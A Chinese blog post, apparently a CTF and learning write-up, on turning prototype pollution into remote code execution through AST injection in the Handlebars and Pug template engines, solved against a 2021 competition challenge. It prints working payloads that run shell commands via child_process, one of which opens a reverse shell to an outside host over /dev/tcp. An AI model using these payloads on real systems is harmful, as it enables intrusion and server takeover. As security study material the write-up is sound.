AST注入-从原型链污染到RCE

已于 2023-11-04 18:43:26 修改
阅读量236 收藏 1
点赞数
文章标签: web安全 node.js 学习
于 2023-11-04 18:42:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/134220180
版权

文章目录

概念

什么是AST注入

在NodeJS中,AST经常被在JS中使用,作为template engines(引擎模版)和typescript等。对于引擎模版,结构如下图所示。
在这里插入图片描述
如果在JS应用中存在原型污染漏洞,任何 AST 都可以通过在Parser(解析器)或Compiler(编译器)过程中插入到函数中。
在这里插入图片描述在这里,你可以在没有过滤、没有经过lexer(分析器)或parser(解析器)验证的输入(没有被适当的过滤)的情况下插入AST。

然后我们可以向Parser(编译器)非预期的输入。

下面就是展示实际中在handlebars和pug使用AST注入执行任意命令

漏洞

Handlebars

本地测试,代码如下

const Handlebars = require('handlebars');

const source = `Hello {{ msg }}`;
const template = Handlebars.compile(source);

console.log(template({"msg": "posix"}));

这是如何在handlebars使用模板的方法,运行结果为下图
在这里插入图片描述

Handlebar.compile函数将字符串转换为模板函数并传递对象因子以供调用

const Handlebars = require('handlebars');

Object.prototype.pendingContent = `<script>alert(origin)</script>`

const source = `Hello {{ msg }}`;
const template = Handlebars.compile(source);

console.log(template({"msg": "posix"}));

在这里,我们可以使用原型污染来影响编译过程。
你可以插入任意字符串payload到Object.prototype.pendingContent中决定你想要的攻击。
在这里插入图片描述
构造payload

{
    "type": "MustacheStatement",
    "path": 0,
    "params": [{
        "type": "NumberLiteral",
        "value": "console.log(process.mainModule.require('child_process').execSync('id').toString())"
    }],
    "loc": {
        "start": 0,
        "end": 0
    }
}

pug

本地测试,源码如下

const pug = require('pug');
const source = `h1= msg`;
var fn = pug.compile(source);
var html = fn({msg: 'It works'});console.log(html);

此为在 pug 中使用模板的常见方法,运行结果为下图

在这里插入图片描述

pug.compile函数将字符串转换为模板函数并传递对象以供调用

const pug = require('pug');
Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`};
const source = `h1= msg`;
var fn = pug.compile(source, {});
var html = fn({msg: 'It works'});
console.log(html);

在这里插入图片描述

构造payload

 {
    "__proto__.block": {        
        "type": "Text",         
        "line": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/p6.is/3333 0>&1'`)"
    }
}

例题 [湖湘杯 2021 final]vote

考察的是pug模板引擎下的rce

源码如下

const path              = require('path');
const express           = require('express');
const pug               = require('pug');
const { unflatten }     = require('flat');
const router            = express.Router();

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));
});

router.post('/api/submit', (req, res) => {
    const { hero } = unflatten(req.body);

	if (hero.name.includes('奇亚纳') || hero.name.includes('锐雯') || hero.name.includes('卡蜜尔') || hero.name.includes('菲奥娜')) {
		return res.json({
			'response': pug.compile('You #{user}, thank for your vote!')({ user:'Guest' })
		});
	} else {
		return res.json({
			'response': 'Please provide us with correct name.'
		});
	}
});

module.exports = router;

给了./api/submit路由,然后看到pug.compile
稍微修改下payload,直接使用(这道题反弹shell不成功)

{
    "hero.name":"锐雯",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync('cat /f* > ./static/1.txt')"
    }
}

成功RCE
在这里插入图片描述

再访问一下static目录的1.txt,得到flag

在这里插入图片描述

_rev1ve
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Apache-Tomcat从文件包含到RCE漏洞原理深入分析1
08-03
漏洞简介2020年02月20日,于CNVD公开的漏洞公告中发现Apache Tomcat文件包含漏洞(CVE-2020-1938)。Apache Tomcat为
2021-湖湘final-Web
feng的博客
01-05 2061
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
2021年--湖湘--final
unexpectedthing的博客
04-28 1337
21年湖湘比赛
[湖湘 2021 final]vote
m0_70819573的博客
04-11 111
【代码】[湖湘 2021 final]vote
第一章 ast入门
qq_43704986的博客
03-22 510
会从ast安装到实践慢慢介绍 做javascript逆向和javascript安全防护必学.
[CTF复现]湖湘2021
anwen12的博客
12-14 3747
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
利用AST对抗js混淆(一) 基础知识
lacoucou的专栏
02-08 2730
此文主要介绍了利用AST对抗js混淆所需要的基础准备工作以及对babel的安装,api说明。
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
AST-injection-ctf:在Nodejs应用中演示AST注入
04-23
AST注射CTF 在Nodejs应用中演示AST注入。 需要Docker和docker-compose! 生成Node.js应用程序映像 docker build -t demo-ctf . 构建映像时忽略所有红线:))) 泊坞窗组成 docker-compose up -d 运行应用 转到本地主机:3000 重新加载,直到一切正常 尝试RCE ^^ 主意 浏览网站的功能,我们可以得出以下结果: 该站点用于统计功能,图形功能 勒索,勒索软件和受害者有3种主要模型 访问每个模型的路径以检查功能,请参阅两个模型勒索软件和受害者都有查看详细信息的功能。 检查两个模型的详细信息,查看受害者只能下载信息,勒索软件可以上传新配置以执行更新,可以上传文件以利用安全漏洞 在正确的功能中观察网站的源代码,以上传勒索软件配置文件: 使用模板引擎的网页是刀片 更新功能已重新注释以进行维护 var c
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
颜亦解析分析-AST反混淆与nodejs调用
zjq592767809的博客
05-31 1186
颜亦解析分析一、抓包并进行简单的静态分析二、网页断点动态分析三.扣取代码,使用python实现自动化请求 一、抓包并进行简单的静态分析 打开Fiddler,然后打开目标网址https://jsap.attakids.com/?url=https://v.qq.com/x/cover/mzc0020002ka95z/k0036081njj.html 这里可以看到请求了https://jsap.attakids.com/Api.php这个接口,其中还需要10个请求的参数。 接着继续看看主页的内容 这里可以看
30分钟学会JS AST,打造自己的编译器
weixin_34348805的博客
01-19 892
这是一棵树嘛直奔主题 抽象语法树是js代码另一种结构映射,可以将js拆解成AST,也可以把AST转成源代码。这中间的过程就是我们的用武之地。 利用 抽象语法树(AST) 可以对你的源代码进行修改、优化,甚至可以打造自己的编译工具。其实有点类似babel的功能。AST高深的狠吓人?AST很简单,并没有你想象的那样高深。很多地方都把这个技术给夸大了,什么编译原理,抽象语法树 光看这名字就觉得吓人。当然...
2021湖湘wp_web
meteox的博客
11-15 4166
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
[湖湘 2021 final]Penetratable
v2ish1yan的博客
09-15 822
湖湘
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4884
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
2021湖湘WEB
~airrudder~
03-02 814
文章目录2021 湖湘MultistaeAgencyPenetratablevote 2021 湖湘 MultistaeAgency 分析参考文章:2021湖湘决赛-MultistageAgency。 一道 Golang 的题目,附件目录结构如下所示: tree . ├── Dockerfile ├── dist │ ├── index.html │ └── static │ ├── css │ │ ├── app.21c401bdac17302cdde185ab
2021湖湘
hezhing
12-08 3089
2021湖湘 只做了一个web,还是问了队友。misc三道题太难了。最后复盘做出来了一个。 web easywii 队友说是p神的知识星球中的内容。后来被人打烂了。 参考链接:Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com) payload ?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['a']);?>+/tm
nodejs原型链污染
最新发布
09-12
Node.js中,原型链污染是一种安全漏洞,它利用了JavaScript中原型继承的特性。通过修改原型链,攻击者可以在目标对象上注入恶意属性或方法。 在提供的引用内容中,通过调用`utils.copy(user, req.body)`函数,攻击者可以实现原型链污染。在`copy`函数中,遍历`object2`的属性,并将其逐一赋值给`object1`。如果`object1`和`object2`中都存在相同的属性,那么就会调用递归函数`copy`来复制这个属性的值。这个过程中,如果`object2`中的属性也是一个对象,并且在`object1`中也存在相同的属性,那么递归调用`copy`函数会继续在这个属性上进行操作。 通过构造特定的恶意输入,攻击者可以将`Object.prototype`中的属性或方法注入到 `req.body` 对象中。在提供的代码示例中,攻击者可以设置 `req.body` 的属性 `secert` 为一个对象,从而使其继承自 `Object.prototype`。这样,`req.body` 对象就获得了 `Object.prototype` 中的所有属性和方法,包括 `toString`、`hasOwnProperty`等。进一步,当代码判断 `secert.ctfshow` 等于 `'36dboy'` 时,就会返回`flag`,使得攻击者可以绕过登录验证获取到敏感信息。 因此,通过利用原型链污染,攻击者可以在Node.js应用中实现恶意操作,并绕过原本的安全检查。为了防止原型链污染的攻击,开发者应该对输入进行严格的验证和过滤,确保不会接受恶意的输入,并且避免直接使用`Object.prototype`的属性和方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值